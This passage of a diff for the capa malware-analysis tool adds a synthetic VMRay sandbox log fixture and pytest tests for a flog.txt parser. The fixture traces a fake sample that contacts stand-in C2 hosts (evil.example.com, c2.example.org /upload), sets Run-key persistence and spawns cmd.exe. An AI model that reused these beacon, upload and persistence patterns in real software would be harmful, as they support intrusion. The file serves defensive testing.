"0x1000" +os_parent_pid = "0x4" +parent_id = "0" +image_name = "sample.exe" +filename = "c:\\users\\test\\desktop\\sample.exe" +cmd_line = "\"c:\\users\\test\\desktop\\sample.exe\" " +monitor_reason = "analysis_target" + +Region: +id = "10" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x1100" + [0001.000] GetCurrentProcess () returned 0xffffffffffffffff + [0001.001] CreateFileW (lpFileName="C:\\Users\\test\\Documents\\config.ini", dwDesiredAccess=0x80000000, dwShareMode=0x1) returned 0x4 + [0001.002] RegOpenKeyExW (hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20019) returned 0x0 + [0001.003] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 10.0)", dwAccessType=0x1, lpszProxyName=NULL, lpszProxyBypass=NULL, dwFlags=0x0) returned 0x4c9804 + [0001.004] InternetConnectW (hInternet=0x4c9804, lpszServerName="evil.example.com", nServerPort=0x1bb, lpszUserName=NULL, lpszPassword=NULL, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0x4c9808 + [0001.005] VirtualAlloc (lpAddress=0x0, dwSize=4096, flAllocationType=0x3000, flProtect=0x40) returned 0x1000000 + [0001.006] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0x1, lpName="Global\\MyMutex12345") returned 0x100 + [0001.007] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7fff00000000 + [0001.008] CreateProcessW (lpApplicationName=NULL, lpCommandLine="cmd.exe /c whoami", dwCreationFlags=0x8) returned 0x1 + [0001.009] WriteFile (hFile=0x4, lpBuffer="MZ\x90\x00\x03", nNumberOfBytesToWrite=0x1000) returned 0x1 + [0001.010] HttpOpenRequestW (hConnect=0x4c9808, lpszVerb="GET", lpszObjectName="/beacon", lpszVersion=NULL, lpszReferrer=NULL, dwFlags=0x84403100) returned 0x4c980c + [0001.011] SetFileAttributesW (lpFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", dwFileAttributes=0x2) returned 0x1 + [0001.012] GetTempPathW (nBufferLength=0x104, lpBuffer="C:\\Users\\test\\AppData\\Local\\Temp\\") returned 0x23 + [0001.013] CopyFileW (lpExistingFileName="C:\\Users\\test\\Desktop\\sample.exe", lpNewFileName="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", bFailIfExists=0x0) returned 0x1 + [0001.014] GetSystemDirectoryW (lpBuffer="C:\\Windows\\system32", uSize=0x104) returned 0x13 + [0001.015] ShellExecuteW (hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe", lpParameters=NULL) returned 0x2a + [0002.000] WinHttpOpen (pszAgentW="WinHTTP/1.0", dwAccessType=0x0, pwszProxyW=NULL, pwszProxyBypassW=NULL, dwFlags=0x0) returned 0x4c9900 + [0002.001] WinHttpConnect (hSession=0x4c9900, pswzServerName="c2.example.org", nServerPort=0x50) returned 0x4c9904 + [0002.002] WinHttpOpenRequest (hConnect=0x4c9904, pwszVerb="POST", pwszObjectName="/upload", pwszVersion=NULL, pwszReferrer=NULL, dwFlags=0x0) returned 0x4c9908 + [0002.003] RegSetValueExW (hKey=0x80000001, lpValueName="Persistence", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\test\\AppData\\Local\\Temp\\update.exe") returned 0x0 + [0002.004] GetAddrInfoW (pNodeName="c2.example.org", pServiceName=NULL, pHints=0x0) returned 0x0 + +Process: +id = "2" +os_pid = "0x1200" +os_parent_pid = "0x1000" +parent_id = "1" +image_name = "cmd.exe" +filename = "c:\\windows\\system32\\cmd.exe" +cmd_line = "cmd.exe /c whoami" +monitor_reason = "child_process" + +Region: +id = "20" +name = "private_0x0000000000020000" + +Thread: +id = "3" +os_tid = "0x1300" + [0003.000] NtQueryInformationProcess (ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x13fb10, ProcessInformationLength=0x18) returned 0x0 + [0003.001] GetComputerNameW (lpBuffer="DESKTOP-TEST01", nSize=0xf) returned 0x1 + [0003.002] GetUserNameW (lpBuffer="test", nSize=0x5) returned 0x1 diff --git a/tests/test_vmray_flog_txt.py b/tests/test_vmray_flog_txt.py new file mode 100644 index 000000000..133d286fb --- /dev/null +++ b/tests/test_vmray_flog_txt.py @@ -0,0 +1,424 @@ +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +"""Tests for VMRay flog.txt parser (#2452).""" + +from pathlib import Path + +import pytest + +import capa.features.common +import capa.features.insn +from capa.exceptions import UnsupportedFormatError +from capa.features.extractors.vmray import flog_txt +from capa.features.extractors.vmray.extractor import VMRayExtractor + +# Fixture files live in tests/fixtures/vmray/flog_txt/ (committed to the main repo so they +# are always present in CI without requiring the capa-testfiles submodule). +FLOG_TXT_FIXTURES = Path(__file__).resolve().parent / "fixtures" / "vmray" / "flog_txt" + + +MINIMAL_FLOG_TXT = """ +# Log Creation Date: 08.10.2024 18:12:03 +# Analyzer Version: 2024.4.1 +# Flog Txt Version 1 + +Process: +id = "1" +os_pid = "0x118c" +os_parent_pid = "0x7d8" +parent_id = "0" +image_name = "svchost.exe" +filename = "c:\\\\users\\\\test\\\\desktop\\\\svchost.exe" +cmd_line = "\\"c:\\\\users\\\\test\\\\desktop\\\\svchost.exe\\" " +monitor_reason = "analysis_target" + +Region: +id = "125" +name = "private_0x0000000000010000" + +Thread: +id = "1" +os_tid = "0x117c" + [0072.750] GetCurrentProcess () returned 0xffffffffffffffff + [0071.184] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1dc + [0066.433] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 +""" + + +def test_parse_flog_txt_minimal(tmp_path): + # Write as binary so newlines are exactly \n (avoids Windows \r\n) + path = tmp_path / "flog.txt" + path.write_bytes( + b"# Flog Txt Version 1\n\n" + b"Process:\n" + b'id = "1"\n' + b'os_pid = "0x118c"\n' + b'image_name = "svchost.exe"\n' + b'filename = "test.exe"\n' + b'monitor_reason = "analysis_target"\n' + b'parent_id = "0"\n' + b'os_parent_pid = "0"\n' + b'cmd_line = ""\n\n' + b"Thread:\n" + b'id = "1"\n' + b'os_tid = "0x117c"\n' + b" [0072.750] GetCurrentProcess () returned 0xffffffffffffffff\n" + ) + flog = flog_txt.parse_flog_txt_path(path) + assert flog.analysis.log_version == "1" + assert len(flog.analysis.monitor_processes) == 1 + proc = flog.analysis.monitor_processes[0] + assert proc.image_name == "svchost.exe" + assert proc.process_id == 1 + assert proc.os_pid == 0x118C + assert len(flog.analysis.monitor_threads) == 1 + thread = flog.analysis.monitor_threads[0] + assert thread.thread_id == 1 + assert thread.process_id == 1 + assert len(flog.analysis.function_calls) == 1 + assert flog.analysis.function_calls[0].name == "GetCurrentProcess" + + +def test_parse_flog_txt_rejects_wrong_header(): + with pytest.raises( + UnsupportedFormatError, match="does not appear to be a VMRay flog.txt" + ): + flog_txt.parse_flog_txt("not a flog\nProcess:\nid = 1\n") + + +def test_parse_flog_txt_sys_prefix_stripped(tmp_path): + # Linux kernel calls start with sys_; parser should strip for consistency with XML + path = tmp_path / "flog.txt" + path.write_bytes( + b"# Flog Txt Version 1\n\n" + b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample"\nfilename = "x"\ncmd_line = ""\nmonitor_reason = "a"\n\n' + b'Thread:\nid = "1"\nos_tid = "0x2000"\n [0001.000] sys_time () returned 0x0\n' + ) + flog = flog_txt.parse_flog_txt_path(path) + assert len(flog.analysis.function_calls) == 1 + assert flog.analysis.function_calls[0].name == "time" + + +def test_vmray_analysis_from_flog_txt(tmp_path): + path = tmp_path / "flog.txt" + path.write_bytes( + MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n") + ) + from capa.features.extractors.vmray import VMRayAnalysis + + analysis = VMRayAnalysis.from_flog_txt(path) + assert analysis.submission_name == "flog.txt" + assert analysis.submission_type == "unknown" + assert analysis.submission_meta is not None + assert analysis.submission_static is None + assert len(analysis.monitor_processes) == 1 + assert len(analysis.monitor_process_calls) >= 1 + + +def test_vmray_extractor_from_flog_txt(tmp_path): + from capa.features.address import NO_ADDRESS + + path = tmp_path / "flog.txt" + path.write_bytes( + MINIMAL_FLOG_TXT.encode("utf-8").replace(b"\r\n", b"\n").replace(b"\r", b"\n") + ) + ext = VMRayExtractor.from_flog_txt(path) + assert ext.get_base_address() is NO_ADDRESS # no base address from flog.txt + procs = list(ext.get_processes()) + assert len(procs) == 1 + threads = list(ext.get_threads(procs[0])) + assert len(threads) == 1 + calls = list(ext.get_calls(procs[0], threads[0])) + assert len(calls) == 3 + + +def test_parse_flog_txt_args_parsed(tmp_path): + """API call arguments are parsed into Param objects for feature extraction.""" + path = tmp_path / "flog.txt" + path.write_bytes( + b"# Flog Txt Version 1\n\n" + b'Process:\nid = "1"\nos_pid = "0x1000"\nparent_id = "0"\nos_parent_pid = "0"\n' + b'image_name = "sample"\nfilename = "x.exe"\ncmd_line = ""\nmonitor_reason = "a"\n\n' + b'Thread:\nid = "1"\nos_tid = "0x2000"\n' + b' [0001.000] CreateFile (lpFileName="test.exe", dwDesiredAccess=0x80000000) returned 0x4\n' + b" [0002.000] VirtualAlloc (lpAddress=0x0, dwSize=4096) returned 0x10000\n" + b" [0003.000] GetCurrentProcess () returned 0xffffffffffffffff\n" + ) + flog = flog_txt.parse_flog_txt_path(path) + calls = flog.analysis.function_calls + + # CreateFile: string param and numeric param + create_file = calls[0] + assert create_file.name == "CreateFile" + assert create_file.params_in is not None + params = {p.name: p for p in create_file.params_in.params} + assert "lpFileName" in params + assert params["lpFileName"].deref is not None + assert params["lpFileName"].deref.value == "test.exe" + assert "dwDesiredAccess" in params + assert params["dwDesiredAccess"].value == "0x80000000" + + # VirtualAlloc: two numeric params + virtual_alloc = calls[1] + assert virtual_alloc.params_in is not None + va_params = {p.name: p for p in virtual_alloc.params_in.params} + assert va_params["lpAddress"].value == "0x0" + assert va_params["dwSize"].value == "4096" + + # no-arg call: params_in should be None + get_proc = calls[2] + assert get_proc.name == "GetCurrentProcess" + assert get_proc.params_in is None + + +# --------------------------------------------------------------------------- +# Fixture-based feature-presence tests +# --------------------------------------------------------------------------- +# These tests load the realistic flog.txt fixtures from tests/fixtures/vmray/flog_txt/ +# and verify that the extractor yields the expected capa features. They act as +# regression tests for the parser — especially the string-argument parsing path, +# which is brittle — and mirror the pattern used by test_vmray_features.py. + + +def _collect_all_call_features(ext: VMRayExtractor) -> set: + """Collect every feature emitted at the call scope across all processes.""" + features = set() + for ph in ext.get_processes(): + for th in ext.get_threads(ph): + for ch in ext.get_calls(ph, th): + for feature, addr in ext.extract_call_features(ph, th, ch): + features.add(feature) + return features + + +def _collect_call_features_for_process(ext: VMRayExtractor, image_name: str) -> set: + """Collect call-scope features only for the process whose image_name matches.""" + features = set() + for ph in ext.get_processes(): + if ph.inner.image_name != image_name: + continue + for th in ext.get_threads(ph): + for ch in ext.get_calls(ph, th): + for feature, addr in ext.extract_call_features(ph, th, ch): + features.add(feature) + return features + + +# --- windows_apis.flog.txt --------------------------------------------------- + + +@pytest.fixture(scope="module") +def windows_apis_extractor(): + path = FLOG_TXT_FIXTURES / "windows_apis.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_windows_flog_txt_process_count(windows_apis_extractor): + """Two processes are described in windows_apis.flog.txt.""" + procs = list(windows_apis_extractor.get_processes()) + assert len(procs) == 2 + + +def test_windows_flog_txt_api_features(windows_apis_extractor): + """Common Win32 API names are yielded as API features.""" + features = _collect_all_call_features(windows_apis_extractor) + for api_name in ( + "CreateFileW", + "RegOpenKeyExW", + "InternetOpenW", + "InternetConnectW", + "VirtualAlloc", + "CreateMutexW", + "LoadLibraryW", + "CreateProcessW", + "HttpOpenRequestW", + "WinHttpConnect", + "GetAddrInfoW", + "GetComputerNameW", + ): + assert ( + capa.features.insn.API(api_name) in features + ), f"API({api_name!r}) not found" + + +def test_windows_flog_txt_string_args(windows_apis_extractor): + """String arguments are extracted and backslash-escaping is correctly unwound.""" + features = _collect_all_call_features(windows_apis_extractor) + for expected_string in ( + # CreateFileW lpFileName (double-backslash in flog → single backslash in feature) + "C:\\Users\\test\\Documents\\config.ini", + # RegOpenKeyExW lpSubKey + "Software\\Microsoft\\Windows\\CurrentVersion\\Run", + # InternetOpenW lpszAgent + "Mozilla/5.0 (Windows NT 10.0)", + # InternetConnectW lpszServerName + "evil.example.com", + # CreateMutexW lpName + "Global\\MyMutex12345", + # LoadLibraryW lpLibFileName + "kernel32.dll", + # HttpOpenRequestW verb and path + "GET", + "/beacon", + # WinHttpConnect pswzServerName + "c2.example.org", + # WinHttpOpenRequest verb + "POST", + # GetComputerNameW result (child process) + "DESKTOP-TEST01", + ): + assert ( + capa.features.common.String(expected_string) in features + ), f"String({expected_string!r}) not found" + + +def test_windows_flog_txt_string_double_backslash_absent(windows_apis_extractor): + """Double-escaped backslashes (as they appear in the raw flog.txt) must NOT appear in features.""" + features = _collect_all_call_features(windows_apis_extractor) + # The raw flog.txt content has C:\\Users\\...; the extractor must normalise to single backslash + assert ( + capa.features.common.String("C:\\\\Users\\\\test\\\\Documents\\\\config.ini") + not in features + ) + + +def test_windows_flog_txt_number_args(windows_apis_extractor): + """Numeric arguments are extracted as Number features.""" + features = _collect_all_call_features(windows_apis_extractor) + # VirtualAlloc dwSize + assert capa.features.insn.Number(4096) in features + # VirtualAlloc flAllocationType + assert capa.features.insn.Number(0x3000) in features + # VirtualAlloc flProtect + assert capa.features.insn.Number(0x40) in features + # CreateFileW dwDesiredAccess + assert capa.features.insn.Number(0x80000000) in features + + +def test_windows_flog_txt_child_process(windows_apis_extractor): + """The spawned child process (cmd.exe) is present and has its own API calls.""" + features = _collect_call_features_for_process(windows_apis_extractor, "cmd.exe") + assert capa.features.insn.API("NtQueryInformationProcess") in features + assert capa.features.insn.API("GetUserNameW") in features + # GetUserNameW lpBuffer string + assert capa.features.common.String("test") in features + + +# --- linux_syscalls.flog.txt ------------------------------------------------- + + +@pytest.fixture(scope="module") +def linux_syscalls_extractor(): + path = FLOG_TXT_FIXTURES / "linux_syscalls.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_linux_flog_txt_sys_prefix_stripped(linux_syscalls_extractor): + """sys_ prefix is stripped from all Linux syscall names.""" + features = _collect_all_call_features(linux_syscalls_extractor) + # Every syscall name should appear WITHOUT the sys_ prefix + for stripped_name in ( + "read", + "write", + "open", + "connect", + "socket", + "execve", + "fork", + "getuid", + "setuid", + "chmod", + "unlink", + "time", + "ptrace", + "prctl", + "mmap", + "mprotect", + "munmap", + "bind", + "listen", + "accept", + "sendto", + "recvfrom", + ): + assert ( + capa.features.insn.API(stripped_name) in features + ), f"API({stripped_name!r}) not found after stripping" + + +def test_linux_flog_txt_sys_prefix_not_present(linux_syscalls_extractor): + """sys_-prefixed names must NOT appear in features (only the stripped form).""" + features = _collect_all_call_features(linux_syscalls_extractor) + assert capa.features.insn.API("sys_open") not in features + assert capa.features.insn.API("sys_execve") not in features + + +def test_linux_flog_txt_string_args(linux_syscalls_extractor): + """String path arguments from Linux syscalls are extracted correctly.""" + features = _collect_all_call_features(linux_syscalls_extractor) + assert capa.features.common.String("/etc/passwd") in features + assert capa.features.common.String("/bin/sh") in features + assert capa.features.common.String("/tmp/backdoor") in features + assert capa.features.common.String("/tmp/.hidden") in features + + +# --- string_edge_cases.flog.txt ----------------------------------------------- + + +@pytest.fixture(scope="module") +def string_edge_cases_extractor(): + path = FLOG_TXT_FIXTURES / "string_edge_cases.flog.txt" + return VMRayExtractor.from_flog_txt(path) + + +def test_edge_case_paths_with_spaces(string_edge_cases_extractor): + """File paths containing spaces are parsed correctly.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert ( + capa.features.common.String("C:\\path with spaces\\file name.txt") in features + ) + + +def test_edge_case_unc_path(string_edge_cases_extractor): + """UNC paths (\\server\\share) are parsed correctly.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert capa.features.common.String("\\\\server\\share\\document.docx") in features + + +def test_edge_case_url_string(string_edge_cases_extractor): + """Full URL strings are preserved as-is.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert capa.features.common.String("https://c2.example.com/payload.bin") in features + + +def test_edge_case_registry_key(string_edge_cases_extractor): + """Registry key paths are normalised to single backslashes.""" + features = _collect_all_call_features(string_edge_cases_extractor) + assert ( + capa.features.common.String("Software\\Microsoft\\Windows NT\\CurrentVersion") + in features + ) + + +def test_edge_case_numeric_args(string_edge_cases_extractor): + """Numeric arguments from edge-case calls are extracted.""" + features = _collect_all_call_features(string_edge_cases_extractor) + # send() len=256 + assert capa.features.insn.Number(256) in features + # recv() len=4096 + assert capa.features.insn.Number(4096) in features + # WriteProcessMemory nSize=4096 + assert capa.features.insn.Number(4096) in features